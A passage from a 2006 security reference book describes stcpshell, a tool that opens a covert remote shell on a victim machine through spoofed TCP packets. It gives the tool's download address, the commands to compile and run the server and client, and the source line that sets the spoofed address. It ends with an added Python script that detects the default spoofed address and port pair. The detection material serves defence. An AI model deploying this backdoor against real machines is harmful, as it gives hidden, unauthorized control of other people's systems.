STCPSHELL

Applying the same principles of covert communication channeling learned from Loki to TCP, a new tool called stcpshell was created. This tool uses spoofed TCP packets to pass information between the client and the server and creates a virtual shell on the victim's computer. Similar to Loki, it also comes packaged as source code and must be compiled.

The stcpshell tool can be downloaded from http://www.datacomm.ch/prutishauser/programming/stcpshell.c.

Implementation

Because the tool must be compiled before it can be used, you need to build it on a machine that has a compiler. If that machine is not the victim machine, add the -static option to the compilation line before the -o switch. The tool can be compiled with the following command:

 attacker# gcc -o stcpshell stcpshell.c 

The server is started by typing this:

 victim# ./stcpshell 

You can then connect from the client to the server by typing this:

 attacker# ./stcpshell -c <server IP address> <client IP address>

The connection can be viewed in the next screenshot. Notice how the commands are executed as if you were sitting at the victim server.

The session between the client and server can be viewed in Figure 10-7, which presents traffic captured by Ethereal. Notice how the traffic between the client and server has a default spoofed IP address of 207.46.131.137. Furthermore, the ports chosen for the connection are 1234 and 4321 (reported as rwhois, which has a default port of 4321). The ports and spoofed IP address can all be changed within the tool's source code, in the following lines of stcpshell.c:

 /* from www.microsoft.com .. you BETTER change this */
 pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137");

Figure 10-7: Stcpshell and traffic captured by Ethereal
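
For defenders, the defaults described above (source address 207.46.131.137, ports 1234 and 4321) can be checked in captured traffic. The following is an added example, not code from the book or from stcpshell; the function names and sample packets are constructed for illustration. Because both values can be changed in the source, a match only identifies an unmodified build.

```python
import socket
import struct

# Defaults the text above reports for an unmodified stcpshell build.
DEFAULT_SPOOFED_SRC = "207.46.131.137"
DEFAULT_PORTS = {1234, 4321}

def parse_ipv4_tcp(packet: bytes):
    """Return (src_ip, dst_ip, src_port, dst_port), or None if not IPv4/TCP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4  # IP header length in bytes (options included)
    if ihl < 20 or packet[9] != socket.IPPROTO_TCP or len(packet) < ihl + 4:
        return None
    src_ip = socket.inet_ntoa(packet[12:16])
    dst_ip = socket.inet_ntoa(packet[16:20])
    src_port, dst_port = struct.unpack("!HH", packet[ihl:ihl + 4])
    return src_ip, dst_ip, src_port, dst_port

def stcpshell_default_indicators(packet: bytes):
    """List which default stcpshell indicators a raw IPv4 packet matches."""
    fields = parse_ipv4_tcp(packet)
    if fields is None:
        return []
    src_ip, _dst_ip, src_port, dst_port = fields
    hits = []
    if src_ip == DEFAULT_SPOOFED_SRC:
        hits.append("default-spoofed-source")
    # The text does not say which side uses which port, so match either order.
    if {src_port, dst_port} == DEFAULT_PORTS:
        hits.append("default-port-pair")
    return hits

def build_packet(src_ip, dst_ip, src_port, dst_port):
    """Construct a minimal IPv4+TCP header pair for testing (checksums left 0)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0, 512, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64,
                     socket.IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return ip + tcp

# Constructed sample packets (documentation-range addresses, not a real capture).
SAMPLES = [
    build_packet("207.46.131.137", "192.0.2.10", 1234, 4321),
    build_packet("198.51.100.7", "192.0.2.10", 4321, 1234),
    build_packet("198.51.100.7", "192.0.2.10", 51000, 443),
]
```
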


Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
Year: 2006
Pages: 175
